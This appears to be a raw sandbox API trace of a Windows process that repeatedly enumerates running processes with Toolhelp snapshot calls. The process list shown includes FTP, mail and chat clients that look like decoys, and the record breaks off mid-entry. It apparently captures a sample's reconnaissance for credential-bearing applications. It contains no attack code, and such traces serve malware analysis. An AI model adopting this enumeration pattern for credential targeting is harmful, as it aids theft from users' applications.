Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0265.600] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0265.602] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0265.603] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0265.608] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0265.609] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0265.611] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.612] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0265.614] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0265.616] CloseHandle (hObject=0x1d14) returned 1 [0265.616] Sleep (dwMilliseconds=0x64) [0265.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0265.784] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.790] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.792] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.796] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.798] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.801] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.802] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.804] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.806] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.858] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.859] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.861] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.864] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.866] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.868] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0265.873] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0265.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0265.879] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0265.881] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0265.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0265.883] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.885] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0265.889] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.891] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0265.892] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0265.894] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0265.895] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0265.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0265.898] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0265.899] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0265.937] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0265.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0265.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0265.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0265.946] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0265.951] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0265.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0265.955] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0265.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0265.964] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0265.966] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0265.968] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0265.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0265.971] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0265.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0265.974] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0265.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0265.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0265.978] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0266.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0266.089] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0266.090] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0266.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0266.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0266.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0266.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0266.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0266.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0266.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0266.105] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0266.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0266.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0266.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0266.116] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0266.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0266.120] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0266.127] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 